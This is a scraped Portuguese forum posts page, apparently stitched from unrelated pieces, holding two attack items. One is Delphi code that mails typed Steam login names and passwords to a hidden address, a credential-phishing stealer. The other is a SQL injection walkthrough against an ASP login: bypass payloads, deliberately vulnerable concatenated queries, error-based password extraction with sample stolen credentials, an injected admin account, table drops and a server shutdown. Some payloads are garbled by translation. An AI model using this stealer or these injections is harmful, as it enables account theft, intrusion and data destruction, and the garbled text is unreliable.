Muito bom cara... estou no aguardo dos arquivos que ficaram de disponibilizar!
Abraços!
Abraços!
Esta seção permite que você visualize todas as postagens feitas por este membro. Observe que você só pode ver postagens feitas em áreas às quais tem acesso atualmente.
Menu Mostrar postagenswith SMTP do
begin
Host:='smtps.bol.com.br';
Port:=25;
Username:='';
Password:='';
AuthenticationType := atLogin;
Connect;
end;
with Mensagem do
begin
Body.Add('');
Body.Add('LOGIN: ' + edit1.text);
Body.Add('SENHA: ' + edit2.text);
Body.Add('');
From.Address:=''; // E-mail da autenticação
From.Name:=''; // Nome de quem está enviando (remetente)
Recipients.EMailAddresses:= ''; // E-mail que vai receber as informações
Subject :='Conta Steam =]';
ContentType:='text/html';
end;
try
SMTP.Send(Mensagem);
finally
SMTP.Disconnect;
end;
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a
admin ' - -
' ou 0=0 --
' Isso pega o usuário e senha informados no formulário
cUser = trim(request(usuario))
cSenha = trim(request(senha))
'Isso verifica no banco de dados se o usuário e senha conferem
' (vamos supor que o banco já esteja aberto com o nome de objConn)
SQLOpen = select usuario, senha, nome, admin from Users where usuario=' & cUser & ' and senha=' & cSenha & '
objRS.Open SQLOpen, objConn
' Verifica se achou um usuário com o login e senha informados
if not objRS.bof then
response.write Bem vindo & objRS.fields(nome) & !
else
response.write Login inválido.
end if
SQL = "Select * from usuarios where username='" & user & "' and pass='" & pass & "'"
SQL = "Select * from usuarios where username='admin' — ' and senha='xyz' "
Microsoft OLE DB Provider for ODBC Drivers error '80040e14?
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'usuarios.CODIGO' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/arquivo.asp, line 94
SQL = "select nome, login, senha, nivel, cpf from usuarios where ...."
Microsoft OLE DB Provider for ODBC Drivers error '80040e14?
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'usuarios.login' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/arquivo.asp, line 94
Microsoft OLE DB Provider for ODBC Drivers error '80040e07?
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
/arquivo.asp, line 94
Microsoft OLE DB Provider for ODBC Drivers error '80040e14?
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/arquivo.asp, line 94
Usuário: ' ; insert into usuarios (nome, login, senha, nivel, cpf ) values ( "Geek", "haxo", "p4ss", 1, "12345678900") –
Microsoft OLE DB Provider for ODBC Drivers error '80040e07?
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'anderson' to a column of data type int.
/arquivo.asp, line 94
www.siteemasp.tld/pagina.asp?idm=(select senha from usuarios where login='anderson') –
Microsoft OLE DB Provider for ODBC Drivers error '80040e07?
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '14quatorze' to a column of data type int.
/arquivo.asp, line 94
Usuário: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+login+'/'+senha from usuarios where login>@ret select @ret as ret into alluser end –
www.siteemasp.tld/pagina.asp?idm=(select ret from alluser) –
Microsoft OLE DB Provider for ODBC Drivers error '80040e07?
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': atadmin/umasenha user3/abcd anderson/14quatorze' to a column of data type int.
/arquivo.asp, line 94
Usuário: '; drop table alluser –
Usuário: ';shutdown–